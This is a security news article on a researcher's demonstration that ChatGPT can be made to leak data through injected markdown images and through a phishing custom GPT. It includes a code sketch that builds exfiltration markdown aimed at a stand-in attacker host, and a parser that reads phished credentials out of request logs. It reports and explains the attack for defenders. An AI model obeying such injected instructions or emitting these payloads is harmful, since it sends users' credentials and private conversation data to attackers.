Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server.
Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of 2023 that ChatGPT was vulnerable to a prompt injection attack that involved the chatbot rendering markdown images.
They demonstrated how an attacker could leverage image markdown rendering to steal potentially sensitive information from a user's conversation with ChatGPT, for example by getting the victim to paste seemingly harmless content from the attacker's website that actually contains hidden malicious instructions.
The attack also works by asking ChatGPT to summarize the content from a website hosting specially crafted code.
In both cases, the markdown image processed by the chatbot - which can be an invisible single-pixel image - is hosted on the attacker's site.
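The exfiltration channel described above can be illustrated with a minimal sketch. The injected prompt instructs the chatbot to emit markdown like the string built below; the domain `attacker.example` and parameter name are hypothetical, and this is an illustration of the general technique, not the researchers' exact payload:

```python
from urllib.parse import quote

def exfil_image_markdown(stolen_text: str) -> str:
    """Build the markdown an injected prompt would ask the chatbot to emit."""
    # Percent-encode the data so it survives as a single query parameter.
    encoded = quote(stolen_text, safe="")
    # When the client renders this markdown it fetches the image, leaking
    # the data to the attacker's web server via its access logs. The image
    # can be a 1x1 transparent pixel, so the victim sees nothing unusual.
    return f"![img](https://attacker.example/pixel.png?q={encoded})"

print(exfil_image_markdown("user@example.com: my secret"))
```

The key point is that the "image" request itself is the data leak: no script execution is needed, only the client's willingness to fetch an attacker-controlled URL.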
ChatGPT creator OpenAI was informed about the attack method at the time, but said it was a feature that it did not plan on addressing.
Rehberger said similar issues were found in chatbots such as Bing Chat, Google's Bard and Anthropic's Claude, whose developers released fixes.
The researcher noticed this week that OpenAI has also started taking action to tackle the attack method.
The mitigations have apparently been applied only to the web application - the attack still works in the mobile apps - and they do not completely prevent attacks.
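The article does not detail how OpenAI's mitigation works. A common defense against this class of attack is to check image URLs against an allowlist of trusted hosts before rendering; the sketch below assumes such a check, with a purely hypothetical allowlist, and is not a description of OpenAI's actual implementation:

```python
from urllib.parse import urlparse

# Hypothetical allowlist -- the article does not say which hosts, if any,
# OpenAI's validation permits.
ALLOWED_IMAGE_HOSTS = {"oaiusercontent.com", "openai.com"}

def should_render(url: str) -> bool:
    """Render a markdown image only if its host is on (or under) the allowlist."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWED_IMAGE_HOSTS)

print(should_render("https://files.oaiusercontent.com/a.png"))   # trusted host
print(should_render("https://attacker.example/pixel.png?q=x"))   # blocked
```

A client-side check like this also explains why a fix can land in the web app while mobile apps remain exploitable: each client must implement the validation separately.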
On December 12, before OpenAI started rolling out mitigations, Rehberger published a blog post describing how the image markdown injection issue can be exploited in combination with custom versions of ChatGPT. OpenAI announced in November that Plus and Enterprise users of ChatGPT would be allowed to create their own GPTs, customized for specific tasks or topics.
Rehberger created a GPT named 'The Thief' that attempts to trick users into handing over their email address and password and then exfiltrates the data to an external server controlled by the attacker without the victim's knowledge.
This GPT claims to play a game of Tic-tac-toe against the user and requires an email address for a 'personalized experience' and the user's password as part of a 'security process'.
The provided information is then sent to the attacker's server.
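From the attacker's side, recovering the phished credentials requires nothing more than parsing the requests the malicious GPT sends to the external server. The sketch below assumes the data arrives as query parameters on a logged request path; the endpoint and field names are hypothetical:

```python
from urllib.parse import urlparse, parse_qs

def recover_exfiltrated(request_path: str) -> dict:
    """Attacker-side view: pull phished fields out of a logged request path."""
    # parse_qs decodes percent-encoding and groups repeated keys into lists;
    # we keep only the first value per field for simplicity.
    qs = parse_qs(urlparse(request_path).query)
    return {k: v[0] for k, v in qs.items()}

print(recover_exfiltrated("/collect?email=victim%40example.com&password=hunter2"))
```

This is why the victim sees nothing: the exfiltration happens as an ordinary outbound web request, indistinguishable from normal traffic from the client's perspective.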
The researcher also showed how an attacker may be able to publish such a malicious GPT in the official GPT Store, despite OpenAI having implemented a system meant to block the publication of obviously malicious GPTs.
SecurityWeek has reached out to OpenAI for comment on the security research and will update this article if the company responds.


This Cyber News was published on www.securityweek.com. Publication date: Fri, 22 Dec 2023 11:13:05 +0000


